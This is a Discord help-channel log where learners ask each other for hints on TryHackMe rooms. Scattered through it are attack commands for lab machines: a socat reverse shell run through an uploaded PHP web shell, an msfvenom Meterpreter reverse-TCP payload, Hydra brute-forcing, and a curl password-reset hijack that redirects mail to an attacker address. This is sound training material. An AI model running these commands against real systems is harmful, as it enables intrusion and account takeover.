#room-hints

1 messages Β· Page 5 of 1

sage oyster
#

cappucino@polonfs:~$ ./.bashrc -p
./.bashrc: line 8: return: can only 'return' from a function or sourced script
cappucino@polonfs:~$ /.bashrc -p
-bash: /.bashrc: No such file or directory

#

hmmmm, ok, might explain why it's not working for me. Instructions stated to download the bash executable, I googled .bashrc and that seemed to make sense from what I could see. Have I downloaded the wrong file, or have I missed something? Thanks TIA

green minnowBOT
#

Gave +1 Rep to @burnt rivet

sage oyster
#

Ah ok, I think I understand what you mean. I'll give it a go and see

sage oyster
#

Sorry, I'm getting really confused, as I don't seem to have those files from within the share mount point. I have a terminal connecting via SSH and can see it, there is a way I can download that file to my attackbox machine isn't there? I thought I remembered in a previous module about SSH downloads, but I maybe mixing that up with Telnet or FTP, as I can't seem to find a way to download it

alpine kestrel
#

sftp should also work

#

if you find scp syntax to complex

sage oyster
#

I've managed to get it copied across now, and it's appearing in the mounted share from my other terminal. Coffee time, then I'll try again with that rather than .bashrc (fingers crossed)

#

@alpine kestrel @burnt rivet Thankyou, I got there in the end! πŸ™‚

dusky iris
#

hey so I am doing John The Ripper room ( https://tryhackme.com/room/johntheripper0 ) and at task 5 question 1, answer was easy to guess because I was looking for 2 characters options, but I still cant get it how was I supposed to know it, can someone give me some hint on how should I actually figure it out ?, I really want to understand the tough process here, even earlier on I was using that python script provided and it was giving me few outputs and I had no good way of actually judging which is the right one, maybe I should use other tools to help me define hashing algorithm used ?

#

so I suppose the question there is - whats the best way to define hashing algorithm used in order to crack them with John -

jolly cedar
#

i have a question regarding corridor. I solved the challenge. I just wanted clarification on the inner workings

glossy trail
dusky iris
green minnowBOT
#

Gave +1 Rep to @glossy trail

glossy trail
#

what i do is look for possible hash algorithim, and the type example ''john --list=formats | grep -iF "ntlm" ''

glossy trail
dusky iris
#

It’s my second account, I removed first because of too many walkthroughs;D now I just do my best to understand it all and check for hits as rarely as possible, good luck to you too!

exotic scroll
#

Hi, would be gratefll for some help, Doing Linux Fundementals, Task 6, Using grep command, I cant find the flag, it says file does not exist.

#

sorry its not letting me attach screen shot.... the command i typed was grep "THM*" access.log

lucid junco
#

!docs verify

proud scarabBOT
lucid junco
exotic scroll
#

Im confident I was on the right machine as I answered the previous question on same machine , loaded from Task 3, I have however terminated machines, closed down browser and started again and .... it worked First time. and thanks Im not verifed πŸ™‚

lucid junco
#

Well, you are now. πŸ™‚

I did it on the machine and it worked.

rocky galleon
#

Hello Guys,

I'm stuck in the room Pyramid of Pain, Task 5,
They ask me to use the Task 2 tools : VirusTotal etc... to find the malware hidden in the ip of the previous question (35.214.215.33)

On these tools, i cant find any malware or suspicious activy, is it normal ?

#

thanks

dawn wind
#

how i can get the flag of streamer? in my name discord

lucid junco
#

@ripe hedge can maybe give you some clarification on how to obtain the streamer role.

ripe hedge
#

pretty sure you have to be a reasonable well known/influential streamer

dawn wind
#

like 15k follows its enough? nah?

#

thx

zinc gale
#

Good evening folks,
I'm having a very weird problem in the Brianstorm room Task #1 question #2. How many ports are open? Sounds simple to me, but I've scanned the VM on multiple days from both my local machine, the attack box and the Kali VM. Everytime I come up with 3 open ports: 21, 3389, and 9999. The room isn't accepting that as correct. I've used the following commands to no avail:

nc -p- <machine_IP>
nc -p- -Pn <machine_IP>
nc -vvv -p- -Pn <machine_IP>
nc -v -p- -T4 -Pn <machine_IP>

Below is a scan from literally 30 minutes ago. The target IP is the current, still running, VM.

# Nmap 7.60 scan initiated Wed Feb  8 22:20:33 2023 as: nmap -p- -vvv -oN nmap.scan 10.10.89.108
Increasing send delay for 10.10.89.108 from 0 to 5 due to 11 out of 31 dropped probes since last increase.
Increasing send delay for 10.10.89.108 from 5 to 10 due to 11 out of 35 dropped probes since last increase.
Nmap scan report for ip-10-10-89-108.eu-west-1.compute.internal (10.10.89.108)
Host is up, received arp-response (0.00044s latency).
Scanned at 2023-02-08 22:20:33 GMT for 2532s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack ttl 128
3389/tcp open  ms-wbt-server syn-ack ttl 128
9999/tcp open  abyss         syn-ack ttl 128
MAC Address: 02:AA:A8:68:21:17 (Unknown)

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb  8 23:02:46 2023 -- 1 IP address (1 host up) scanned in 2532.47 seconds

Am I missing something really dumb, or is there a glitch in the room?

Many thnaks for the help.

alpine kestrel
#

you can probably guess the number if you try

#

or you can check for udp ports

zinc gale
#

It's a single digit, so yeah I can guess it, but I wanted to ensure that I wasn't missing some learning point.

alpine kestrel
#

yeah that is fair

#

though the main purpose of that room is not to have fun with nmap but the priv esc

zinc gale
#

Over the last week I think I tried UDP scans, but it isn't in my notes. I'll give that a try again. Yeah I redid BOF_Prep like 5 times. New to Buffer Overflows, and I wanted to get it down. Brainstorm is the first time I've tried a download the program and run it locally. I'm looking forward to it.

#

Thanks @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

abstract cypress
#

hello everyone, i'm doing the agent sudo room, and i'm stuck at task 5, i can't find the CVE relative to the target kernel, i've searched in the websites that the exploit vulnerabilities room suggests but i couldn't find it. any websites suggestions to look at??

alpine kestrel
#

also try and run sudo -l and search a bit about said output

abstract cypress
#

ooh thank you very much @alpine kestrel

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

no problem.... assume you got it now???

abstract cypress
#

i got root but i still can't find the damn CVE lol ^^

alpine kestrel
#

if you are using exploit-db it states the cve on the exploit page

abstract cypress
#

i tried all the relative cve that i found in exploit-db but none of them work, but i was looking using the kernel, i'll try with this vuln

alpine kestrel
#

yeah then maybe you did not get root the intended way

#

after all this room is quite old so it is vulnerable to quite a few exploits that are newer then the room

#

the intended one uses the sudo binary

#

which shadow thought the room name made obvious

exotic scroll
#

hi all, working through Linux fundamentals part2-task 2, and cant log in using the password in the video, tried several times? have checked typing password in lower case, and its the only machine I can access in this lesson, any ideas would be helpful.

pine dust
exotic scroll
#

So where im i going wrong.?????.

pine dust
#

you are missing @

#

ssh tryhackme@{MachineIP}

exotic scroll
#

i missed the "@"

#

Thanks πŸ™‚

north spire
#

Looking for some advice on the linux priv esc task 11 NFS.

#

I can mount the share on the remote machine, create the file and compile the exploit on my kali laptop, copy it over, set it +s but when i try to run it from the machine itself, i get a GCC error

#

GLIB_C error

#

but i assumed it was compiled correctly on my machine when i made the exploit as there was nothing mentioned otherwise

#

gonna terminate it and start again

north spire
#

$ cd tmp
$ ls
nfs
snap.lxd
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

#

i take it the VM has an old version compared to kali?

barren cloak
#

Hello everyone,

I need a hint or the command to get the information for the OWASP room, Title Injection v4, Task 5 (Command Injection Practical), question How many non-root/non-service/non-daemon users are there?

I did a search of a command and did a "cat /etc/passwd" and receive a list of users but not sure if I'm reading the output correctly to form a correct response to the answer.

First, do I have the right command/request to get the output I need, and second what am I looking for or how do I parse the output?

little ingot
#

hey everyone. Im on 'Windows Local Persistence". Is this room buggy? I have been working this room for some time. Some times the exploits will not run. I have tried to run some tasks more than once to fully understand them, but they only work when they want to. I have checked my history to make sure I have duplicated the command correctly, But the room sometimes works and mostly it does not. any help please.

young gulch
icy parcel
#

Hi there got issue with operating system security room

#

Wont let me enter password

tender olive
#

hi can anybody help me with DVWA installation

oak notch
#

Hey all! Completed the python for pentesters room just this week and went on to https://tryhackme.com/room/scripting, got through base64 even though that was a hassle too since i thought my script was messed up since the first 5 letters didnt change in around the first 30 loops.. But on to the problem i have atm in https://github.com/JormaWuorio/TryHackme/blob/master/gottacatchthemall.py.. I can get the ip and portnumber which i succesfully connect to, but when i get to the looping part, i can randomly get through 1-3 operations and i cant for the life of me figure out the reason.. stacktrace is printing out something about connection refused, but i cant get to the root reason why its disconnecting at sometimes and on others its not.. im also waiting for 4s on each loop so it should switch only after the port has closed.. also tried with 3 and 4.1 to try and compensate for lag and such but no dice.. One possible problem i have is im doing the loop with requests instead of sockets but somehow i doubt thats the case, even though im not sure where do i get the info to STOP if the port number is still not 9765.. Any tips on what to try?

idle spear
#

Hi, still stuck with the 'Taunt' section of #Sakura room. I have the latest url of the deep web site as of today but the url is not working / saying the answer is correct. Anyone?

civic pilot
#

Anyone have any insight on https://tryhackme.com/room/crypted ?

I have the img file indexed and have looked everywhere I can think of for task one, even cracked 2 of the passwords in the shadow file but no luck with the right answer

hushed flame
#

I’m in Steel Mountain, Task 4. I downloaded the exploit, and adjusted the IP and Port. I still can’t get a connection with http.server. What am I doing wrong? I also keep seeing a lot of people skip this particular exercise. So it’s starting to make me wonder πŸ€”

pine dust
#

I have done this part so i'm sure it works fine.

hushed flame
pine dust
#

Dm me. I'll help you out with this.

hushed flame
# pine dust Dm me. I'll help you out with this.

I already closed everything. I appreciate you offering to help. You’re welcomed to DM me what I should do, though. But I followed three other YouTube videos, and all of them skipped over Task 4. They all said they were running into problems with it.

hushed flame
pine dust
green minnowBOT
#

Gave +1 Rep to @pine dust

pine dust
pine dust
civic pilot
# pine dust Wow. Do you mind giving me a hint ? I have been at it for long time.

Not sure where you are at with it but you have to mount the NFS server to get the img file. You can either use strings to search the binary or use something like Autopsy to index it. But there are some encrypted files inside the img that seem to be the only ones of importance and I don't know how to go about decrypting them (no clue what the encryption type is or the passcode/IV - I have some ideas of what I can check on next but I definitely need a break from it for a bit

pine dust
green minnowBOT
#

Gave +1 Rep to @civic pilot

civic pilot
night warren
#

hello i am finishing Rick and MortyCTF and im trying to connect to ssh but i have this error R1ckRul3s@10.10.1.36: Permission denied (publickey). Am i on the right track?

night warren
#

okay than you

barren pewter
#

I am stuck at volatility. I try to run any command with

'python3 vol.py -f <file> <plugin>'

however it throws me an error that vol.py does not exist, I am stuck in this damn room for a while now. Can someone tell me I am not crazy and just did a typo or so, please?

unborn moon
barren pewter
#

I dunno, ls doesn't work. I am using precisely the command I was told to use?

unborn moon
#

Could you share some screenshots please? And room url + task so that I can have a look πŸ™‚

barren pewter
#

sure, I have to restart the VM

#

this might take a moment -/

unborn moon
barren pewter
#

I am using the deployable machine in Task 3

#

Btw. thank you for your help :)

#

In comparison

unborn moon
#

You are not in the right directory

#

When running a python command, you need to be in the directory that contains the file, or specify the full path to the file in your command

barren pewter
#

I tried to go to /opt/volatility3 too

#

ah no nevermind when I did that I had a typo facepalm

#

thank you for your help

unborn moon
#

no worries πŸ™‚ and you mentioned using "ls" earlier on and not seeing anything, you can use something like ls -la. This will list all files (even hidden ones)

barren pewter
#

uh, thank you for the tip! I will be sure to remember that. Thanks =)

unborn moon
barren pewter
green minnowBOT
#

Gave +1 Rep to @unborn moon

turbid gazelle
#

Hello can anyone tell me about this problem in part 1 of windows fundementals

#

"What is the keyboard shortcut to open Task Manager?"

#

i respond ctrl shift esc

#

and it's wrong

rustic sphinx
#

Tried "Control+shift+escape"?

fathom dome
#

add '+' chars in between the words

#

it will do it

turbid gazelle
green minnowBOT
#

Gave +1 Rep to @rustic sphinx

turbid gazelle
#

it counts even when i put a backslash

turbid gazelle
#

can't rdp to the windows fundementals machine

umbral umbra
unborn moon
green minnowBOT
#

Gave +1 Rep to @umbral umbra

umbral umbra
steel grove
#

hi , I try on BOF perp in level 3 and when i give the address in EIP to jump to ESP its not work ! for example i sent this address "\xc7\x11\x50\x62 on the immunity change the address and output like this 620D0AC7

night warren
#

hello how to get to login.php in Rick and Morty Capture the flag?

lucid junco
brazen dune
#

Hi guys, I am trying to crack the private ssh key using johntheripper. When I am giving this command -
python ssh2john.py id_rsa > id_rsa.hash
It is giving me the following error - :
[id_rsa] couldn't parse the keyfile.

#

Where am I going wrong?

pine dust
brazen dune
#

Just now I realized I only copied the main text, not the info like AES , begin ,end etc.

#

Thanks @pine dust

green minnowBOT
#

Gave +1 Rep to @pine dust

vernal roost
#

Hi,
i'm stucked whith a step in Relevant chall
does anybody has 5min to help me pinpoint it ?
trying to exploit my finding and cannot get a shell...

vernal roost
#

nobody for a hint for MSF ?

ebon jewel
#

what room

vernal roost
#

I do relevant and i try to exploit one of the vuln without success since 1h

ebon jewel
#

can you link the room

vernal roost
ebon jewel
#

!docs verify

#

hmm

#

i didnt do that room. so can't tell for sure. sry

vernal roost
#

maybe i just use msf wrong

#

looks all good but i never get the reverse shell and the VM crash 😦

#

[*] 10.10.230.156:445 - Receiving response from exploit packet
[-] 10.10.230.156:445 - Did not receive a response from exploit packet

rain charm
lucid junco
#

Why can't you get sticky keys to work?

sage oyster
#

Evening all.... I'm stuggling with task 4 on https://tryhackme.com/room/authenticationbypass
I think I am missing a step or something, as I haven't seen a popup, or change on the site after running the code in terminal. Is it supposed to give me a new webpage with the changes? There's an image on the task showing a change of email address, but I am not 100% sure how that happens :/
I tried to copy the outputted code, create an html file, but that didn't seem to work either, so I am a little lost.
Any pointers where I'm going wrong would be greatly appreciated

soft gate
#

Hey guys I'm stock with Walking An Application course Task3 Question 3.

#

I need dome help

#

I mean some help

tall geode
#

i am stucked on tryhackme shaker room,any tip?

young gulch
#

Where are you in the Shaker room exactly?

tall geode
#

@young gulch i have compile exploit.java and upload exploit.xml on server,i have setup listener to 8888 and get exploit.class but i can't get reverse shell

#

i follow those steps for ldap marshaller

young gulch
#

Do you understand how the exploit should work?

tall geode
#

no exactly but i follow the stepsπŸ˜†

#

i have compile the exploit.java with latest jdk-default,17 version

#

no errors return

mint dune
#

anyone can help me with brainstorm room? i downloaded chatserver.exe but i cannot open it on immunity debugger its saying i need 64bit

young gulch
#

Are you using a 32bit system?

knotty peak
#

Last task

#

I ran searchsploit the server version and am having trouble running the exploits

magic moon
#

hol up I'll do the room real quick

knotty peak
#

Thanks for the help in advance !

magic moon
#

where are you stuck?

#

running the exploit?

#

can you post the command youre trying to execute?

#

@knotty peak

knotty peak
# magic moon where are you stuck?

before my issue was i forgot to put python3 before running the python script but after I realized that I noticed that the code didnt make sense to me the comments are a little hard to read

#

I found an exploit written in C and can understand it a bit better

#

but I do not understand what I have to change to get it to work in my case

magic moon
#

I got it with the python script so I can help you with that if you want to try it again

knotty peak
#

yea sure

magic moon
#

ok so what were you executing?

knotty peak
#

since I couldnt read the code that smoothly I tried just running it with no changes and when I got the error:

#

File "29316.py", line 109 print "-> n0 w3bs3rv3r 0n %s" % (args.h) ^ SyntaxError: invalid syntax

magic moon
#

how did you find out what script to run?

knotty peak
#

i ran nmap on the target machine to find the version used for the http service than used that to find exploits on searchsploit

magic moon
#

So the room usually helps you find the way to exploit the vuln going back to question one for Task 5 start there

#

I can also hop in voice and help you there if you want to ask more questions

knotty peak
#

In the library rn so I wouldnt be able to talk but I could listen if its easier than typing everything

magic moon
#

I'm fine with typing library probably not that great with talking πŸ˜„

knotty peak
#

Okay yea lmao. I appreciate the help

magic moon
#

No problem πŸ™‚

knotty peak
#

Oh this is a lot better an easier then what I was doing lmao gotta remember not everything is super complicated

magic moon
#

yeah I seem to be doing the same more often than not

knotty peak
#

I am able to get the exploit to work

#

thank you sm

#

if you dont mind I can send you a dm of the code i was trying to work with lmaoo

magic moon
#

Haha no problem, yeah sure kinda curious πŸ˜„

knotty peak
#

How do I do the plus rep thing here

magic moon
#

Uh i think replying to me saying thanks work or +rep @<user>

knotty peak
#

+rep @magic moon

green minnowBOT
#

Gave +1 Rep to @magic moon

knotty peak
#

Again thank you for the help! 🫑

#

I will def bother you/this channel later so bye for now lmao

magic moon
#

anytime πŸ™‚ bye bye

sage oyster
#

Good morning all, curious question - How do I chase up a request for hint/help if I've not had a response? I don't want to be seen as spamming :/
Many thanks in advance

lucid junco
#

When/Where did you post it?

sage oyster
#

sorry if i'm a bit cack-handed here, still trying to get used to discord

lucid junco
#

What are you trying to do?

I'm not a subscriber, so I cannot access the material.

sage oyster
#

oh ok, it's supposed to be exploiting a logic flaw in a website, and using curl, it should change what I see on the website, but I don't get that. I'm not sure if it is supposed to happen automatically, or if I need to reload the website somehow? I'm a little lost...

knotty peak
sage oyster
knotty peak
#

Where are you stuck

sage oyster
#

after i made a curl request, the webpage didnt change

knotty peak
sage oyster
#

2, from what i can gather it's supposed to change the email address in the web page message

knotty peak
#

can you send the curl command you are using

sage oyster
#

curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com' used the example code

knotty peak
#

what message are you seeing

knotty peak
sage oyster
#

yeah, changed the ip address, i didnt receive any errors from the terminal, or on the website. I was expecting the message on te website to change to the attacker@hacker.com email address

knotty peak
#

I think you are good

magic moon
#

Could someone give me a hint for KoTH Hackers on an entry point? I seem to be stuck bruteforcing my way in currently.

#

Also im not 100% certain my hydra syntax is correct for the ||/backdoor|| form

knotty peak
#

I am on task 5

#

I looked at the hint and every time i try the exploit i am told the system isnt vulnerable

magic moon
#

thats a 404

stuck fractal
#

And it's a 404.

magic moon
#

oh my god

#

pain

#

shouldn't have reused commands from history

knotty peak
mint dune
#

hi guys i am having a problem in brainstorm room for bufferoverflow
i have tested the chatserver.exe and the script run perfect on local ip and i get a shell
when i change the script to my target machine ip i dont get a shell very weird any suggestion? i tried to restart the machine 2 times and still same

#

nvm worked it was the openvpn problem!! thank you guys

ionic ivy
#

Hello, I can't finish this question in the "OSINT DOJO" room.
Everything I have tried has not worked.
Can someone help me ?

pine dust
#

Follow the link and check the image. Use the url from there as your answer.

ionic ivy
green minnowBOT
#

Gave +1 Rep to @pine dust

pine dust
ionic ivy
pine dust
#

The one with hash from the image. i want to see what's wrong.

pine dust
#

You have used i instead of j in 2 places.

ionic ivy
green minnowBOT
#

Gave +1 Rep to @pine dust

pine dust
ionic ivy
severe bloom
#

Hi, is this where I can get help with the Linux Modules room? I'm on task 6 awk and I managed to get the required output exactly but they insist on the answer being in another format. I've tried reading all the links in the task including some of my own which I found online but I can't find the answer in the format that is required to pass. [edit] My answer is actually shorter than the required format.

lucid junco
#

Can you link the room?

severe bloom
#

Wow that was quick! Thanks! https://tryhackme.com/room/linuxmodules [Edit]It is task 6 awk the first question. I got the second question correct. [Edit2]Pardon me, it's the second question which is giving me problem, I got the third one correct.

uneven trout
#

hello i need help

#

they ask me to Execute the command from Example 8. Instead of the string Policy search for PowerShell. What is the name of the 3rd log provider?

white salmon
#

Hello
I have a strange result from the nikto command in the room https://tryhackme.com/room/toolsrus
I use the command : nikto -h <server>:1234/manager/html -id bob:<password>
It says that the connection was successfully authenticated but the result only says that 1 Tomcat documentation was found but the expected value is 5 (I'd seen a writeup doying the same command and having another result)

knotty peak
#

Can someone explain what this command does the room isnt too helpful

#

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

knotty peak
wanton sluice
#

Hi guys, Im stuck on a question that I know is easy but having hard time figuring it out. Jr Pentesting / Walking An Application / Task 3 Viewing The Page Source / 3rd Question..... What is the directory listing flag? Thank you for your help.

unborn moon
wanton sluice
#

The question asks "What is the directory flag?" I am having trouble identifying the directory and therefore am not sure where to look for the flag. Hope that helps

unborn moon
wanton sluice
#

ive opened all css/js files from page source. I also navigated through website and viewed all source code for those pages.

#

also added /.nav-collapse at end of url

wanton sluice
#

also fount flags for THM Static Labs & THM{CHANGE_DEFAULT_CREDENTIALS}

unborn moon
#

Hey, sorry was on the plane. You still need help?

wanton sluice
#

unfortunately, yes

#

i tried adding /.nav-collapse at end of url and was redirected to Page Not Found. I then opened all links on source code but did not find flag. Also, viewed all pages to website and opened those source codes but no luck. I thought it would be the same process as the previous question "secret flag" but still stuck

wanton sluice
#

OMG i got it. thank you ALL for the help, much appreciated.

wanton sluice
green minnowBOT
#

Gave +1 Rep to @unborn moon

quick holly
#

@stuck fractal Here's the error I wanted to show you:

#

Do you know what this is?

stuck fractal
#

What's your port forward?

quick holly
#

I'm using ssh -L 2049:10.10.209.245:2049 -L 111:10.10.209.245:111 -L 20048:10.10.209.245:20048 paradox@10.10.209.245 -i id_rsa

stuck fractal
#

That's a lot more than you need for the version of NFS in use

stuck fractal
quick holly
#

That's the box IP

stuck fractal
#

It is.

#

First thing I'd look at is how to mount NFS||v4||

quick holly
#

So it should link my own localhost port to the localhost of the box, right?

quick holly
#

So in this case, mount -t ntfs 127.0.0.1:/home/james /tmp/share_here

stuck fractal
#

Definitely not -t ntfs

#

It's not ntfs

quick holly
#

oops

#

nfs

#

my bad haha, typing error

#

Wait, I made that typing mistake in the earlier commands

#

thanks for your help haha

stuck fractal
#

iirc it'll only talk v4

quick holly
#

Yep yep

#

It still doesn't want to work though ;-;

stuck fractal
#

You only need to forward one port, and the IP in the middle of the -L matters

quick holly
#

only the 111? I'll try

stuck fractal
quick holly
#

The 2049?

stuck fractal
#

Have you read into the changes from v3 to v4?

quick holly
#

I now have

quick holly
quick holly
#

Thanks for your help @stuck fractal :)

green minnowBOT
#

Gave +1 Rep to @stuck fractal

stuck fractal
#

@quick holly Please don't post images with flags in

quick holly
#

Was there a flag?

#

oh shit, my bad haha

#

sorry :<

frosty verge
#

@quick holly I think you get it what to do next!

quick holly
#

I've actually found it

#

Hydra had an issue because it was version 9.1

#

so I've reinstalled it to 9.5

#

and I got the password using

hydra -l jason_test_account -P list.txt 10.10.204.250 http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=l6jjj91qbp4867sesgnso2ti78; user=jason_test_account; pwd=abkr:Incorrect" -I -V
#

Thanks a lot for your help though :)

#

I appreciate it

#

Hydra version 9.1 gets stuck on HTTP-POST-FORM requests

frosty verge
quick holly
#

I'll continue the room tomorrow (probably)

frosty verge
quick holly
#

I'll see you then :)

frosty verge
frosty verge
quick holly
#

It was probably the right call to make back there

#

But I really want to get better at Hydra

#

so I'll push myself to use it more

#

and I think I found the reason why I was getting stuck everywhere haha

frosty verge
#

okay

light tundra
#

Hello all! I'm in the Protocols and Servers room, Task 4: File Transfer Protocol. I'm able to connect to the target machine using FTP but am unable to grab the flag because it's saying permission denied. halp?

lusty ibex
#

hi

quick holly
#

Hey hey

quick holly
#

But I need some more information

#

What username and password did you use?

#

and what exact commands did you run?

rich field
#

Hiya

#

Can someone assist me with the Windows Forensics 1 room?

#

I found the complete path where the python installer was run but having issues with the answer format

rich field
#

One sec

#

Let me paste here

pine dust
#

Mark it as spoiler.

rich field
#

Of course

#

Please give me a few need to re-pull the registry

rich field
#

||c:\users\thm-4n6\appdata\local\package cache{3182483d-078b-48fa-92c2-798baa1fe27d}\python-3.8.2.exe||

#

@pine dust ^

pine dust
rich field
#

no doubt I just dont..

#

wait

#

think I found it but there is something I'm not understanding

#

||z:\setups\python-3.8.2.exe||

#

why?

#

why the ||UserAssist|| artifact?

#

I thought I should be looking at ||AmCache||

pine dust
# rich field why?

I'm not smart enough to explain why. I guess i know why but i can be wrong.

rich field
#

give it a go

#

so the question asks about installation path... so I thought ||AmCache|| gives me that so for sure I'll look at that hive

#

but then it ends up being under ||NTUSER.DAT||... maybe I dont understand the type of info this hive can give me

serene slate
#

Hello

quick holly
#

If you need some help, it's best to ask and wait for an answer

alpine kestrel
quick holly
#

Ah, I see

#

What do you need help with @serene slate ?

lucid junco
#

Lol. Shadow just told you.

bitter wagon
#

for operating security i am trying to input sammies password after inputing his ip in the attackbox and it's not working

#

been stuck on it since thursday

cerulean vector
#

can someone help me in this question from AV evasion module from Red teaming paath.

young gulch
#

How do you view files in hex

kind patrol
#

On Linux fundamentals part 3 I went to wget the file I need to finish the questions it just loads forever

lucid junco
kind patrol
lucid junco
chrome helm
#

I was confused by this task - Firewalls Task 7
I don't fully understand where I should run the listener?
And what do they mean by localhost?
I drive into the command line on the server:
ncat -lvlp 8008 -c "ncap 10.11.7.31 80"
or
ncat -lvnp 8008 -c "ncat localhost 80"
And I have to send the command from my attacking machine:
nc 10.10.180.167 80
nc 10.10.180.167 8008
?My head is swollen.
Please help me figure out who passed it.

lunar inlet
#

Hi All, I just completed the vulnerability capstone (https://tryhackme.com/room/vulnerabilitycapstone) which was a lot of fun. The only thing I struggled with was finding the correct exploit to use. I got a bit too focused on the wrong exploit (https://www.exploit-db.com/exploits/49487). I eventually used a hint and it had a completely different exploit in it (which worked immediately).

So my question is - how was I supposed to find this exploit? The way I found the others was to use the command searchsploit fuel but given that the exploit in the hint doesn't have the word fuel in it, I'd guess I'd need to use something more like this: ``find / -type f -exec grep -H 'fuel' {} ;`

Is this correct or am I doing this totally inefficiently? Thanks for any hints!

signal totem
#

Hi All! I'm in the Network Services room, Task 6: Enumerating Telnet. I'm trying to scan the target but it's taking an hour or more for nmap to finish. Just wondering if this is normal or if I'm using the wrong flags. This is the command: nmap -vv -sS -p- [ip]

lucid junco
#

It will take ages because you're scanning all 65+K ports.

#

You can also speed flags in the form of -T1-5 1 being the slowest, 5 being the fastest.

#

I'd suggest you just do

nmap -T4 -p- $targetip

signal totem
#

Thanks! I'll try that

gentle plume
#

hey im doing the bugged room. I have figured out most of it but not sure on certain parts

gentle plume
green minnowBOT
#

Gave +1 Rep to @lucid junco

knotty peak
#

I am would like some help on how to upload a precompiled socat binary inorder to set up a socat bind shell

#

Steps followed:
Uploaded a php file that allows me to send commands via the url
Uploaded a socat binary (found in the room)
Set up a reverse shell on my computer using socat TCP-L:4444 FILE:'tty',raw,echo=0

I then tried this http://TARGETIP/uploads/rshell.php?cmd=socat%20TCP%3AATTACKBOXIP%3A4444%20EXEC%3A%22bash%20-li%22%2Cpty%2Cstderr%2Csigint%2Csetsid%2Csane

I then get an error socat[11708] E open("tty", 02, 0666): No such file or directory

#

I understand what the error is saying but I dont know where the file is supposed to be

#

The room says " we are passing in the current tty file" but I am not sure what file it is refrencing

young gulch
#

Like `

knotty peak
young gulch
#

tty is a command

young gulch
grave pendant
#

Hi guys

#

I’m stuck in Network Services task 4

#

can someone help me please ?

lucid junco
#

What is your issue? πŸ™‚

You'll get an answer faster if you just state the issue.

grave pendant
#

I don’t understand how to look to the interesting documents on th SMB part

#

I see we could try to connect with Anonymous account

#

But I don’t know how I can find the password

lucid junco
#

Anonymous doesn't need one.

lucid junco
#

I'm sure the task description mentions it, but not 100%

grave pendant
#

I got this when I push enter :
||root@ip-10-10-54-146:~# smbclient //10.10.55.152/secret -U Anonymous -p 445 WARNING: The "syslog" option is deprecated Enter WORKGROUP\Anonymous's password: tree connect failed: NT_STATUS_BAD_NETWORK_NAME||

lucid junco
#

smbclient //10.10.55.152/profiles -U Anonymous

#

Try that command πŸ˜„

#

Sorry, that wink face seems patronising.

grave pendant
#

thanks

lucid junco
#

Did it work? πŸ™‚

grave pendant
#

yes

#

Sorry I change my keyboard...

lucid junco
#

πŸ™‚

You had /secret in your ip.

Secret was only used on the last question as an example of the syntax you'd use. πŸ™‚

grave pendant
#

Why do we have to go to profiles and not secret ?

#

Ok thanks

#

But in that case, when we type //10.10.55.152/profiles is it not to specify the directory where we want to connect ?

lucid junco
#

Yes. During the enumeration stage, profiles was a share that stuck out.

grave pendant
#

πŸ‘

#

Which commands can we use when we are connected ?

#

I would like to use cat or something to read text files... πŸ˜…

lucid junco
#

I think more is used to read files in smb.

grave pendant
#

good one thanks

lucid junco
#

more "filename.txt"

Speech marks are needed.

grave pendant
#

I tried less πŸ˜…

lucid junco
#

Did that work?

Sometimes I can only remember the commands when I'm on it πŸ˜‚

grave pendant
#

yes perfect πŸ˜‰

grave pendant
#

Sorry to bother you @lucid junco but... How can I download a file... scp doesn't work and scopy doesn't seem to be the one...

lucid junco
grave pendant
#

download it

#

Here the instructions :
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

knotty peak
green minnowBOT
#

Gave +1 Rep to @young gulch

vapid isle
#

Hi, can someone point out what am i doing wrong?

#

Thanks, when you said it i noticed it instantly i ident select the actual file πŸ˜„

green minnowBOT
#

Gave +1 Rep to @burnt rivet

lunar inlet
#

Hi, I'm running this command

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe -a x64 --platform windows LHOST=10.10.250.29 LPORT=1234

Then when I transfer the file over to Windows and run it I get: This app can't run on your PC. To find a version with your PC, check with the software publisher.

Can anyone see anything I'm doing wrong here. The windows box is a THM box for this specific exercise and I've confirmed it's x64 arch. All the walkthroughs say this should work but alas not!

alpine kestrel
lunar inlet
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

lunar inlet
alpine kestrel
#

well it was worth a shot

lunar inlet
# alpine kestrel well it was worth a shot

agreed! Thanks for the suggestions.

At this point I'm wondering if I've hit some sort of a bug or something. Like maybe the THM box isn't working the way it should. The online guides seem to have no problems with this exercise

green minnowBOT
#

Gave +1 Rep to @alpine kestrel

proud scarabBOT
lunar inlet
#

thanks for the input! I was using a multi/handler and ran set payload windows/x64/meterpreter/reverse_tcp then show options. Nothing really stood out to help here to be honest. I actually can't even get to the stage where the EXE even tries to hit the handler, it just fails to load entirely

green minnowBOT
#

Gave +1 Rep to @burnt rivet

lunar inlet
#

Ok I'll double check that again now, thanks

lunar inlet
#

darn - same thing. I tried with a multihandler and a netcat listener. No traffic from that windows box on that port at all, so I'm pretty sure the exe isn't even starting. I'm going to look into wether there's a debug output or something I can tap into for the exe to see if it's doing anything weird

grave pendant
#

+Rep @lucid junco

green minnowBOT
#

Gave +1 Rep to @lucid junco

magic falcon
vapid isle
#

I'm a little confused? πŸ€” keep saying am wrong by inputting Suite or Updates

unborn moon
vapid isle
unborn moon
vapid isle
#

burp suite room task 7, not I have not looked yet, don't want to just get it off the net, rather someone who might know might simply give me a hint

unborn moon
vapid isle
green minnowBOT
#

Gave +1 Rep to @unborn moon

unborn moon
#

There is a section that discuses the 4 main sub sections of the user options tab

placid plume
#

Hey all ,need some help ,
Basic Malware RE task2
